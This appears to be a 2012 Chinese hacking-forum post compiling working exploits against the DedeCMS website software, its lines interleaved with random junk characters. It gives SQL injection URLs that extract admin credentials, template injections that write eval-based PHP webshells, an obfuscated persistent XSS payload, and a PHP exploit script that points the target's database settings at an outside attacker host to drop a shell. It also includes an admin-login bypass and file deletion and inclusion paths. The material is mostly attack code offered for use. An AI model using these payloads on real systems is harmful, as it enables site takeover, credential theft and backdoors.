中国网络渗透测试联盟

标题: dedecms漏洞总结 [打印本页]
作者: admin    时间: 2012-10-18 10:42
标题: dedecms漏洞总结
& w4 N& n  n4 \. @3 Z5 j
Dedecms 5.6 rss注入漏洞
3 b, o/ b' ?6 r; ^  J5 Y0 F, yhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
/ n: {' L* R. |& Y
- O6 C9 R! y9 A
9 ^1 o) K2 f4 V0 j4 k  [) i6 ^, ~7 \" [1 P4 h0 y2 }6 c6 x: A- Z7 T
3 u% e- x+ w" Y/ ?
: S% o0 a  y+ I2 J

7 K& [1 j) H  x  u3 r% b9 J
" U& e$ Y/ h& |! n# q( i4 a: r+ q% S6 \; N
DedeCms v5.6 嵌入恶意代码执行漏洞4 e- s0 Z( K  {5 ]
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}( v% H0 S1 x" B
发表后查看或修改即可执行
% j: u, n' ?& ea{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}" z  J6 j; A" [/ m) G) X
生成x.php 密码xiao,直接生成一句话。' p) |* Z! a& b" m& @" i' U
) F' N8 }# s& u( i* O
) w2 b: m! l; h+ x: B: ]

- n/ v# B3 b& z' p8 S# d
# ]) [1 q6 I; e: b. p2 s6 k* m% D* X: N2 s
4 ]" }! _: B. h& T

  V* J: w0 W3 D" h4 l" S" l
0 k- G  }5 O* B4 j) \- c0 |Dede 5.6 GBK SQL注入漏洞
% o0 v! i! d( E5 B/ W# ]http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
6 S( m) T! Q" W( ^  U9 ~" t: m6 {http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe% \: S3 c# B# m/ u- c/ a2 m
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
: o! T8 z, x, j& Z
7 T; Z$ b. z) x
1 U! r0 @$ y: b  J3 p8 ~" T: g9 M+ Q% T# P8 _( D( Q& `" y" t  K7 V
7 {  F$ M% J) L$ O  P
. j; Q  K6 ^. T3 H4 t/ z+ X

$ G& K6 E6 e9 I" o; O
. D5 o9 n( v1 _  ?  b1 w/ F! f6 Q# d1 G! B7 F, w! x+ D6 A
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞, o7 a* ?" V* l" ?$ q2 \# Z
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
7 w1 O9 J# F, S5 D, C" Q% `
1 d) p0 G$ v$ g/ R% a. F8 T3 M( y9 R

" R9 {* ]7 H! T$ y
9 @  I8 u8 ?5 Z7 ~1 g
8 i9 N  ^) n; h  u( O- K. \4 _. z7 A; w$ E
DEDECMS 全版本 gotopage变量XSS漏洞
7 ]0 a, ~& N: o( ?2 N9 n! ^1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
, O  V& G  C. T; c- x* j" ]% Jhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=": e. U$ `; i2 |/ e: |/ s' J+ ~

9 {" M* ~7 f4 q6 K8 L
- b7 @9 q% q! @. Z. H' ?0 a2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
/ l, m* z7 V/ {* N% b& N) X! Ehttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda) d/ Z% A9 u# v& l' ^2 B/ l1 {8 L

& T6 J  p! D! U' G1 K0 ~2 }
& J! G4 I+ a, f/ k0 ~, |http://v57.demo.dedecms.com/dede/login.php
  O7 }% `$ u1 X6 s; Z, ~' y/ v5 m; \
& R3 m/ l& }; P
color=Red]DeDeCMS(织梦)变量覆盖getshell
6 ^, ]( c/ D" O  X#!usr/bin/php -w; C# `0 l/ v  c2 Q3 N  s1 Y
<?php- L, u: v1 W( i1 j, D( y2 z& Y
error_reporting(E_ERROR);% s- ~9 Z) W! F+ K( M4 }1 M; c" R
set_time_limit(0);# y' L2 n3 Q& u
print_r('- E) @1 i+ }& P  M- a% O* D
DEDEcms Variable Coverage! ^; a$ G- |3 g6 W0 m
Exploit Author: www.heixiaozi.comwww.webvul.com
' X" Y$ A" Q: k7 c: b8 J/ G8 r);
/ k$ }! P* V- H; ^/ H: fecho "\r\n";% O: L# i1 E5 W' I; @
if($argv[2]==null){
; x! B" T/ t, ^; M5 d- kprint_r('
3 Y0 j# E% Y# {3 n) o- k: n+---------------------------------------------------------------------------+
( y! k2 V8 r$ w6 A% W- YUsage: php '.$argv[0].' url aid path4 h2 d, c# z2 ]+ u
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
4 d& \$ Z9 `, vExample:8 P2 |/ y+ F) [+ v7 a" d
php '.$argv[0].' www.site.com 1 old
" Y$ n: R9 R1 l4 i6 K+---------------------------------------------------------------------------+
, s( f& k& ?, h& B* N. ~# g');! y0 E( p: R, I9 w, @! D
exit;$ _8 K, C, q7 n4 O9 W, z, \
}# ~9 G* k. F# J: |+ T
$url=$argv[1];/ [% I+ |1 c3 W7 k7 U8 }0 a. ]
$aid=$argv[2];. M% N3 O- L1 U' `& Y: g/ Q
$path=$argv[3];1 }! y# @6 t6 x
$exp=Getshell($url,$aid,$path);  X, Z( a0 w9 f2 i
if (strpos($exp,"OK")>12){
7 [) i$ u5 o5 L6 becho "
% e% M7 [; r  wExploit Success \n";7 j: |) x4 W5 Q, A
if($aid==1)echo "/ C/ j3 u1 @& C* Q7 n* y
Shell:".$url."/$path/data/cache/fuck.php\n" ;$ ?' p$ g- U3 y" F
  P! R9 w) ?+ w  q1 v3 @
4 r/ B$ p/ i! `
if($aid==2)echo "9 f9 O4 ?+ u3 F; X
Shell:".$url."/$path/fuck.php\n" ;
/ t0 K8 [) y6 a: s# d/ N) Q. o" ~8 D3 O8 t

' |5 B, z% W* X$ |. |4 oif($aid==3)echo ": v4 R$ ^# h( Z8 y/ {, t. l  `
Shell:".$url."/$path/plus/fuck.php\n";
' m6 S5 i0 h- C, t
  }* U# O+ i9 z# S  @' {3 `# S' J
0 D5 T- G/ w" K}else{
) H" x" `  H8 E/ t5 Aecho "
, M! a, W9 V: f# K. UExploit Failed \n";" I9 a: y  T" G
}' ?% c. Q+ ^; `/ S6 c, [
function Getshell($url,$aid,$path){; O" D+ D) `& }2 T( `5 x+ g$ T# @$ t
$id=$aid;" l$ |4 }: s8 V+ C9 l" l
$host=$url;1 ]5 d+ z; V  p0 V" j- f' H
$port="80";$ a' p) w, ~9 i1 t
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
  H7 X4 J* @2 Z1 r! L$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";( w4 s9 W3 W( _5 b) |0 E( \
$data .= "Host: ".$host."\r\n";
. r$ G* ~9 |' l. Q9 }, x$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
4 A1 n5 d! C0 M" M# F1 n0 B$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
& I( Q- L0 Z1 ~4 Z$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";6 K; S  }/ x  I1 f0 g1 W4 v2 V
//$data .= "Accept-Encoding: gzip,deflate\r\n";3 x% x# n0 W# s( U/ u. x. `- P# n
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";4 `. m$ D6 P+ ~2 @3 a
$data .= "Connection: keep-alive\r\n";) G  _! w) e9 I
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
9 ~" v- A( ?9 P$data .= "Content-Length: ".strlen($content)."\r\n\r\n";- B$ K5 m# j5 t. g/ |# }* v3 u
$data .= $content."\r\n";
0 B9 j" o& @) O! y$ock=fsockopen($host,$port);
  ?/ @% `. x" B0 jif (!$ock) {# ~. a5 \7 S6 T1 g% `
echo "2 ^% U& G( B0 B8 W" [9 A* \
No response from ".$host."\n";
9 T# Z6 g; `. m0 {* Z+ w}
3 o0 Q: x# h7 cfwrite($ock,$data);
1 p0 H( V. j4 x8 Y  q+ O/ z" u/ `while (!feof($ock)) {; K, C" G1 o3 p2 j4 S& {. q# Z
$exp=fgets($ock, 1024);
; Z) ~& t- w( [! }' ^' g1 Nreturn $exp;9 R2 w% w1 U# G7 r3 E, w
}1 x3 A! T7 ~6 D7 E( T. O" t" v6 n
}+ Z8 q$ _- a; P! D5 Y' a
+ T! `" M9 k9 F2 q2 a0 a
, Z( S& t# {0 t% v
?>7 P3 s! R5 ]  ?6 F# }/ ^

) _4 O/ g6 t5 e0 q
+ V% n) @& }  u! E
# v0 G9 N9 P) h/ ^) T1 H
) F  M! x) {) l
, f: p, O  A6 M( m8 o& d5 \+ s* h3 J, s% j+ L: f2 ]

( l' u2 v9 u2 O2 [
$ W$ Q7 b4 B6 I5 g4 M! M& T8 ]7 b* r4 ~2 K3 A
8 l8 l( U- X& g& n* |; {' n9 t) l0 I
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
/ S1 Q6 L" f/ m2 @. w9 x* W5 x% L9 khttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root: x" ]% B4 Y5 \. s
) B! y0 s6 k) ^) R# o# B
2 z. h5 Q" r: b$ d3 q. e' [
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
8 M6 L4 H% S# G- u1 l6 }
% r8 \( G2 T0 O& F4 T5 }. o- }( |4 C' @) w: F& \0 \
此漏洞的前提是必须得到后台路径才能实现
+ d% V$ j1 [5 M+ p: x! z# w
& S- d6 O% C+ k  g* k. ^) c+ }7 E: K9 H/ Z/ p1 `+ P. W8 ]$ j

& F: q! W- r7 x" n8 ~0 x$ O& B" {" S0 W5 Z# N* l& h
8 h8 z" L$ Q" a$ t7 n3 c, z
% c7 G; R. k1 R8 [  K

1 T! D+ c/ w6 ^7 R
4 s( f8 Y# T0 q3 s# {- D" G8 Z
9 ]% ]% J0 k( j) o& [2 H, [3 m. a: A- K( j
Dedecms织梦 标签远程文件写入漏洞% J; p3 m7 r4 D
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');. G, ~- p& i1 |; t$ |. ^5 r

6 M' h# S- f- O! n* w; _, O4 [+ e2 {2 z) z$ {
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 9 G) B4 [+ Z  ^- z
<form action="" method="post" name="QuickSearch" id="QuickSearch">0 I; n  f+ r+ L* C; D9 R. v
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />+ w8 y5 I! h$ W: K: m* ~! c5 L
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />" o: Q' E# \8 }) r: K
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
% C( n. @2 c' Q  X<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />9 P" d" {/ I, z' D/ b0 Y- J3 s
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
; \, T- F) r( Y<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
1 b# e! Y: R7 X6 s9 T7 ^& q7 j' |' {' p<input type="text" value="true" name="nocache" style="width:400">
* N* m/ b4 k# H" i! b& X7 A<input type="submit" value="提交" name="QuickSearchBtn"><br />$ S( y8 P, ]1 d2 k% W
</form>
# X1 R/ N4 U& A; Q& F: t4 G<script>! M$ i6 R! B# q  S
function addaction()
9 C# p- t) d1 \% U6 r) I% W8 _{# w" t% g' b# ]# g3 ^; i- P! _
document.QuickSearch.action=document.QuickSearch.doaction.value;
3 h2 y9 l  _; x- J}
: K9 P" I$ M* `# D2 E* E</script>
: W. d" l4 I; |2 M; A0 d/ v; J  V+ z8 `( ^1 n8 }5 p7 _8 l

8 h) I, b* N6 u) L* V5 y/ k( Y$ A/ H7 M/ @
# a. n4 ^* w1 \; q) o; M9 I0 D* K
4 `, h: J. m0 |# K% ?6 k
6 d! A+ z6 m- q+ y) Y

6 W0 s5 j; N( Y4 v" e- g
  r0 o% |; V7 ^: N6 [
' ?" p: I& w9 y  C4 J" Z5 i1 y( w, J7 X+ t+ b
DedeCms v5.6 嵌入恶意代码执行漏洞
/ @; s5 m& A: j) ?$ S) J" m注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
$ o0 l% |- d6 o# o- sa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}, r; p7 [! d8 U9 d' t. E; F- y0 Q
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得0 b2 F  q& B; z" T: @
Dedecms <= V5.6 Final模板执行漏洞
3 z8 ~5 {0 h/ W! s( S注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
" m3 W, r; M8 d9 f* n+ L1 Duploads/userup/2/12OMX04-15A.jpg
6 L- P- Y2 N7 W8 A4 h' |
6 z) q& h# n# K( _+ Q  K7 }0 R# d& E0 o. P. W+ N+ P# k" G
模板内容是(如果限制图片格式,加gif89a):
  Z& d" j0 b8 W- g{dede:name runphp='yes'}+ j) u/ p. r, w, ^9 X
$fp = @fopen("1.php", 'a');
8 m4 _& e( v$ `@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");+ R& i  k4 n& D0 [# J& s9 |8 `2 r
@fclose($fp);# u1 p$ d: E9 m4 L- S. u
{/dede:name}
. R; g0 n8 B8 i9 ~2 修改刚刚发表的文章,查看源文件,构造一个表单:
7 K# f6 l6 O( O# S1 |<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">; U$ b8 T! m! G6 ~$ L
<input type="hidden" name="dopost" value="save" />' J0 f  N7 k) \/ @* _: {! P8 m3 U
<input type="hidden" name="aid" value="2" />3 f$ X) y6 Y! u! R( \& s- R
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />& p. G/ V2 P" A7 W
<input type="hidden" name="channelid" value="1" />7 a3 n& d: s5 [  ^" A* L3 z+ N
<input type="hidden" name="oldlitpic" value="" />0 `1 ]( O* B( ^& s
<input type="hidden" name="sortrank" value="1275972263" />
8 [' U) |7 a& n
2 g; h( F9 ~# s( @/ L
4 I0 Q" o" c; o  E* V4 \<div id="mainCp">; H+ j3 `4 l- ^/ S  O6 U
<h3 class="meTitle"><strong>修改文章</strong></h3>
$ r0 M* B2 `) X5 o( ^0 m: p% `: f7 N5 N4 o4 |

1 m- u! o4 ?- _, o<div class="postForm">$ `" A  D; V/ e. u' F# ]! Z2 N
<label>标题:</label>, m) a8 ^3 k/ ?2 @5 K- M
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/># x( m8 ^- p2 W+ @3 u
' h# n( \8 A" n8 Q
5 y4 c, \) h* U; F5 B; d* w, J$ o
<label>标签TAG:</label>
, y' t$ l5 n) `<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
" B) }4 V/ ]; p* i0 q2 L
: y8 d+ i' ~3 Z; T  r" |! {1 J9 t4 v0 m1 r& |' i1 B
<label>作者:</label>
$ }2 N2 s$ z3 k, a, ?8 P( \. f<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>" c( V5 F2 g9 P& `9 h
5 J1 [) _) v/ \; q: c$ L7 n5 ]

" j; R/ L; l$ d6 ^. Q6 @2 {<label>隶属栏目:</label>9 a/ o, M) s$ m6 G2 M
<select name='typeid' size='1'>
  L+ l% o0 O6 s* G# S; M<option value='1' class='option3' selected=''>测试栏目</option>% F1 N8 D( c* d
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
" P; M+ {0 x  z" y9 g9 {# s% e, w3 Y- W5 h5 y: ^+ @6 d. m

, G% O( }- Y! n5 N<label>我的分类:</label>- ~2 v' [, W: {0 w" Q
<select name='mtypesid' size='1'>+ w# O$ W7 {5 \7 U. l
<option value='0' selected>请选择分类...</option>
' G3 x" a; e/ W6 I5 g  L2 m) [6 U<option value='1' class='option3' selected>hahahha</option>+ v6 w5 y5 f5 \# g3 J; b+ i4 v  b; S
</select>
# D( c: ?' H+ J" h1 u1 s4 C1 y4 t/ |' Z1 ^) O& q
2 d2 }  m2 |" d9 H6 `6 I
<label>信息摘要:</label># _. N' V/ j  k
<textarea name="description" id="description">1111111</textarea>
9 c) b9 K3 R0 u(内容的简要说明)
; j1 N9 |8 Q" Q& X  k. K3 c4 Y" e3 q' U) L: T
, P) M# u' C. _# W
<label>缩略图:</label>& I6 }3 B+ l. J4 C+ ]5 K7 r) g
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
+ p3 ~3 _, i* F) x
5 T3 z$ N9 G% {# ~: h
2 L# @* D: q' W% e4 G. Z0 ~<input type='text' name='templet'
( W$ g: q$ K6 F) G" l/ Avalue="../ uploads/userup/2/12OMX04-15A.jpg">1 p0 p/ T7 Q& q# W
<input type='text' name='dede_addonfields'
" m) S2 I" Z& O9 s, Jvalue="templet,htmltext;">(这里构造)
3 L+ ]/ y3 b  u# U2 T' F</div>; o( b4 C3 p3 z( l& n
7 }! T6 k; X, C2 K9 L
, e! X- E6 }3 ^2 b! P( X
<!-- 表单操作区域 -->! h/ T1 Q$ P" r( @2 O
<h3 class="meTitle">详细内容</h3>5 ]6 @1 J, |6 O9 q& [3 M, g
' t6 Q, b# p, M; J7 k
% F% V+ `$ c  D1 G* W$ P4 |( e' \+ c
<div class="contentShow postForm">
3 M/ S, I  d+ z, q. |<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>; n, p) O/ }1 [5 R9 x

9 ^6 I$ ]6 r6 `
# U# {6 s1 t4 w& P) X2 [6 T<label>验证码:</label>
3 G2 {4 E6 H0 D* D% J& k( d<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />6 h' V( e$ v4 ~+ x% A' l
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
9 r( S0 ~& j( e* {3 `: H7 b" s9 a
0 Y3 y# M( G8 J2 N. F4 D3 Z5 h' m6 I
<button class="button2" type="submit">提交</button>* Q/ m( J1 |0 k! y0 @! l" z! H1 i
<button class="button2 ml10" type="reset">重置</button>1 E3 U# d8 r, q4 |0 P6 [+ {' m
</div>
3 u: M3 r6 m8 B
2 \% m$ Y) _) L: W/ e$ s' N# q2 s- J: s# V" R/ x/ y6 d
</div>  j) O+ s' C& n( P6 F* v
: Y1 H: x; G! j( @/ \
/ r# x+ f+ K. T* i
</form>( j% U4 k1 j6 H2 Y
# b+ c8 n- g$ t" s& K5 P3 `- R; {: ]
4 z8 E/ S8 V- B5 ]
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:# j/ {' F0 p7 k2 A1 ]7 @! h
假设刚刚修改的文章的aid为2,则我们只需要访问:0 Q# f2 n4 B  S( i2 z- ]
http://127.0.0.1/dede/plus/view.php?aid=2
3 \* Y5 b7 z' ^7 V即可以在plus目录下生成webshell:1.php
2 E, B% ^& E4 ?! `
$ z. \/ u% B6 d$ R" o
8 i% l. n  u7 F* z) D% h( n/ d2 L# u# R% t/ U  \: b. a* @

% d5 j6 ]9 e9 Z* L: x6 B* J; T1 d& G9 d7 u- y, B! T, |: M1 L
/ t$ B' W% w& i  r8 w

( z+ @! ], b% O1 o
3 E, w: M8 d; m9 U' f
, j  [/ g' |* B: E9 p5 ^3 H6 }1 P. ^! h7 E* ^1 U
. Y: c/ c, @' h

1 o* f# f) |0 b, aDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)7 v! |; g& T9 X& a/ J5 n% n; b9 h
Gif89a{dede:field name='toby57' runphp='yes'}1 R4 u5 w2 v$ [1 l1 e8 Y9 @" @
phpinfo();7 e/ E, @8 ]1 k: g% g! i+ h" `! }" U
{/dede:field}0 g  s8 a/ Z7 P* N8 T
保存为1.gif
5 J6 ?( ^) w  t<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
% t6 T& y9 m. Q  ?0 N" q<input type="hidden" name="aid" value="7" /> 1 C7 t- j+ B: Y6 R" V6 L
<input type="hidden" name="mediatype" value="1" /> 7 Y3 m& K& _* z3 f, M; q* ~/ K; N
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
/ I5 T5 T4 I) x' X. y/ k<input type="hidden" name="dopost" value="save" /> 1 {4 E! }% i, v. A( ?8 d
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
4 M: S* `. i/ S<input name="addonfile" type="file" id="addonfile"/>
( Z. J5 K* r5 G' x: M3 G<button class="button2" type="submit" >更改</button> $ t# c# c9 v0 P7 i+ \  Q2 _
</form>
$ l3 L  {( z1 k' ^; C! w5 ^8 Y* S' v" f+ w4 V

/ L$ A  V6 D, n) c构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
; S  l" J. ]( w2 Q发表文章,然后构造修改表单如下:
1 u7 V  ~, Z, o# m% u: e! _) ?1 |2 Q4 b3 _6 b
/ D. ]0 ~4 Z' {  j$ J
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
2 o8 e8 Q4 U2 o6 a" c<input type="hidden" name="dopost" value="save" /> ) r  R1 s; @, Z8 O' {5 e
<input type="hidden" name="aid" value="2" /> 4 f, f; e0 X& ~0 j/ i7 O
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
# Z: y: T5 H: w6 q' P( o8 N<input type="hidden" name="channelid" value="1" />
5 E" I( z( x% G2 o<input type="hidden" name="oldlitpic" value="" />
0 Z0 c  p5 J2 [! A: h<input type="hidden" name="sortrank" value="1282049150" />
+ O! N1 G. g6 w& F2 {8 ]) s- F4 {; D. G<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
$ J% k2 x$ W' d<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
! ~% Z$ Y* X3 {+ J' f7 X<select name='typeid' size='1'>
* }5 ~2 L8 y7 ~7 O, F' O' ?8 Z# r<option value='1' class='option3' selected=''>Test</option> - y3 E# {% `1 N- S7 a: f
<select name='mtypesid' size='1'>
4 N# @& i3 D& K" V1 q<option value='0' selected>请选择分类...</option> 3 K0 E1 D6 L+ G5 L+ h- l- V
<option value='1' class='option3' selected>aa</option></select> ) @( U+ t: j) _
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
4 }7 W9 k2 i* [; Q+ ~, U<input type='hidden' name='dede_addonfields' value="templet">
4 Y; L# d  r$ a<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
  Z0 n8 x/ t) i8 G/ |8 Y<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ; r9 a8 \1 y" B; G5 c5 A; {( t' {
<button class="button2" type="submit">提交</button>
$ ]5 i9 L0 y, v4 W</form>
: w9 y/ Y% A+ d' c. G8 J9 E$ p) Z2 h* u+ V8 V
, T; Y# c0 v1 O- \

6 H0 Y; P+ t# `/ m* I$ V& @3 T' Q5 i& p% g) e- R& \1 ?0 z
! ^/ N- F" m& n1 ?

' |2 H5 C5 y/ v2 m2 E* J  v$ {+ q" r/ d; K

% F- w$ r3 r$ n; ]- q/ k, X  j0 h5 n- b- h% m2 P( B, H5 @0 z

- J6 k/ r- M  D) I  ^- P8 C
! _* q; `+ n5 \/ M, f* G: M$ \% [- w
织梦(Dedecms)V5.6 远程文件删除漏洞! O# w0 \0 N; i# p- X: y
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif7 D7 `1 ]% r! l1 F2 F
6 Y  k6 }! Z0 X# J8 C+ d! D
& X; R" N4 k4 d# H& g5 j$ ~
- k+ S: x* _( h9 F# v

: q  U+ C9 e9 ~# z! P; K# \- `1 U) Q, L
* ^* Y& Y& E, r" A' l! n, o

. p9 z+ n5 q. L
$ B3 b% X  O& h7 O! L& b9 v$ ~, i$ I% n
& ^) y) J% ^( b. S. j
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 / b: |- m5 W1 P: S/ F1 a
http://www.test.com/plus/carbuya ... urn&code=../../) |; @( T+ Z* V3 ?

; Q& B' \6 A: e; y7 n( T" m0 v( u0 f0 S; V2 L2 }
- v( f" @2 W) z3 U  Q) z

8 J- V* B2 y/ {+ ~1 Y; ~) f5 Z+ f6 N

. B) _& V) P& t' ~
" k- _1 O" C# G. b) N4 p- d+ {; Z  D
" R  S' D8 u3 V( p; `* N  C

( Q' M) i: u0 K- w; ~3 cDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
& E) V/ J9 b" s8 pplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
5 g0 M; O7 j/ u0 y9 M; c3 H密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
1 C! m2 |2 o/ e1 ^
+ {" C& I% b$ ?, a$ U2 y- q8 `* I! t% r
" }) G/ x! b7 s* |

: G' x7 r2 G. e
( z: ~1 _: c. ?8 u6 c+ ]
! _. a0 ~, o2 S; g& A5 x& j# s8 X
6 y* S" N. f+ J# x* V

7 K; e: P$ q( o% k6 D$ g* x# n8 Q
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞# V# o: i& V8 ~2 P; ^# v
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
" Q: l$ Y4 {, I4 H
# p. E. X' ~7 v, E% l! n& p' q- ]% K. W" Q: d3 U; N" i& Y
+ b5 t$ W" x; M3 j; B. v( H& U
6 j2 N5 e. M- x4 N

! k5 h: _. T; u+ _! _- B. X0 q0 S2 H/ i# C3 C+ V

$ F* n) s, |1 [. m) o9 T3 m
* z/ O, r7 O- F% ~( \1 v2 v- t- k3 a3 M' M
